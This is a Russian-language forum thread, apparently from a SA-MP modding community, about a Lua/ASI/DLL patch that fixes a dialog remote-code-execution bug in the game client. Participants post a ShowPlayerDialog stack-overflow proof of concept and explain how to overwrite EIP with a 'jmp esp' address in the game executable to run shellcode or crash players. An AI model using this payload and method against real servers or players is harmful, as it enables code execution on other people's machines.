Lua ASI DialogRCEfix

D

deleted-user-422095

Гость
Так самп же умер. Есть единицы крупных проектов, которым это просто не надо, да и это начиная с R3 пофиксили. Таким образом можно ломануть только полтора инвалида с нуборп, которые играют на старой версии сампа.
Пофиксили только на R5
 

FYP

Известный
Администратор
1,763
5,904
Боже мой. Да миллиард раз уже это всё это было прочтено. Как оно работает то может хоть кто-то рассказать?
переполнение буфера на стеке
Код:
ShowPlayerDialog(playerid, 1337, DIALOG_STYLE_LIST, "heh", "nanananananananananananananananananananananananananananananananananananananananananananananananananananananananananana kyebatman\x11\x22\x33\x44\x55\x66\x77\x88", "OK", "");
 

_razor

t.me/sssecretway | ТГК: t.me/razor_code
Всефорумный модератор
1,943
3,188
Так самп же умер. Есть единицы крупных проектов, которым это просто не надо. Таким образом можно ломануть только полтора инвалида с нуборп, которые играют на старой версии сампа.
но ведь есть и другие сервера в том числе и иностранные, на старых версиях 90% игроков остаются лишь из-за плагинов по типу SAMPFUNCS
 

F0RQU1N and

Известный
1,309
498
переполнение буфера на стеке
Код:
ShowPlayerDialog(playerid, 1337, DIALOG_STYLE_LIST, "heh", "nanananananananananananananananananananananananananananananananananananananananananananananananananananananananananana kyebatman\x11\x22\x33\x44\x55\x66\x77\x88", "OK", "");
прикольная темка, ток я как понял нормальный шеллкод тут врядли удастатся выполнить(у меня не получилось)
ток челику игру крашнуть например 5 нопов \x90\x90\x90\x90\x90 вставить
 
Последнее редактирование:

al3x_

Известный
Автор темы
125
1,084
прикольная темка, ток я как понял нормальный шеллкод тут врядли удастатся выполнить(у меня не получилось)
ток челику игру крашнуть например 5 нопов \x90\x90\x90\x90\x90 вставить
получится, после переполнение первые 4 байта запишутся в eip. можешь добавить адрес (в обратном порядке) на инструкцию "jmp esp" и твой шеллкод выполнится. и главное, чтоб нулевых байтов не было в адресе/шеллкоде
пример:
132 любых байтов кроме 0
"\x1B\x20\x55\x01" - адрес в гташке на jmp esp
"\x01\x02\x03\x04\x05\x06\x07\x08\x09 etc" - шеллкод (максимум 120 байт)
 
Последнее редактирование:

EvgeN 1137

?
Проверенный
169
659
@Tema05 @F0RQU1N and и другие, кто хотел знать подробности о том, что это такое:
 

whyega52

Гений, миллионер, плейбой, долбаеб
Модератор
2,776
2,595
Нужно ставить одну из этих версий, или можно только луа, только аси, только патч длл? Не нужно ставить к примеру луа и длл одновременно?
Нет, только одно. Это одно и тоже, просто в разных вариациях
 
  • Нравится
Реакции: 0x18d036